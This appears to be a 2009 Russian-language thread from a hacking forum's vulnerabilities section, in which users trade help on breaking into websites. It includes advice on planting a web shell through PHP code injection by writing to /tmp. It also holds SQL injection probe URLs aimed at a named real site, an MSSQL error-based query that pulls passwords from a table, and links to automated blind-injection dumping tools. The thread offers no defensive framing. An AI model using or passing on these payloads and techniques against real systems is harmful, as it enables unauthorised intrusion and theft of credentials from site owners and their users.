ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6851  
Старый 26.04.2009, 22:31
AngelOfFaith
Новичок
Регистрация: 02.02.2009
Сообщений: 19
С нами: 9089110

Репутация: 9
По умолчанию

хм, я читал эту статью только у меня постоянно белая страница вылазит(((
Как с этим боротся?
 
Ответить с цитированием

  #6852  
Старый 26.04.2009, 22:48
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Ещё один вопрос.
На сайте есть уязвимость выполнение php кода (php inj), однако запись практически везде запрещена, ну куда-то запись конечно есть.
Выполнение системных команд там невозможно как и инклуд.
Папки аватаров и прочей хрени тоже нету.
Что в этой ситуации можно сделать для залития шелла?
 
Ответить с цитированием

  #6853  
Старый 27.04.2009, 00:37
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

tmp Должен быть доступен для записи....можешь туда залить...и инклудить при желании.
 
Ответить с цитированием

  #6854  
Старый 27.04.2009, 16:20
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию

Подскажите здесь можно что то зделать, вот sql:
Цитата:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+order+by+9--+
union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ.

БД по всей видимости MySQL:
Цитата:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+@@global .sort_buffer_size+--+
но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся):
Цитата:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+1=1--+

http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+(1)=1--+
и в hex тоже
Цитата:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+%281%29= 1--+

Последний раз редактировалось PaCo; 27.04.2009 в 16:56.. Причина: Грамотей
 
Ответить с цитированием

  #6855  
Старый 27.04.2009, 17:37
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
С нами: 9217595

Репутация: 149
По умолчанию

чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
 
Ответить с цитированием

  #6856  
Старый 27.04.2009, 17:39
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

хз, вроде нету таких тулз. для мускуля есть сипт4. напиши скрипт пхп простенький
 
Ответить с цитированием

  #6857  
Старый 27.04.2009, 18:05
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip
 
Ответить с цитированием

  #6858  
Старый 27.04.2009, 18:14
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

Цитата:
чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
Pangolin может, читал в обзоре, сам не пробовал
 
Ответить с цитированием

  #6859  
Старый 28.04.2009, 13:08
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
Сообщение от Rav1n  
чем можно сдампить ms sql базу?

чтобы руками не перебирать например такое
=1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+fr om+part_pass+where+inc=1)--
1 потом 2,3 итд
http://kachakil.com/papers/SFX-SQLi-Bin.zip (если mssql 2005/2008)
 
Ответить с цитированием

  #6860  
Старый 28.04.2009, 16:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Каким запросом производить инъекцию в ibase?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.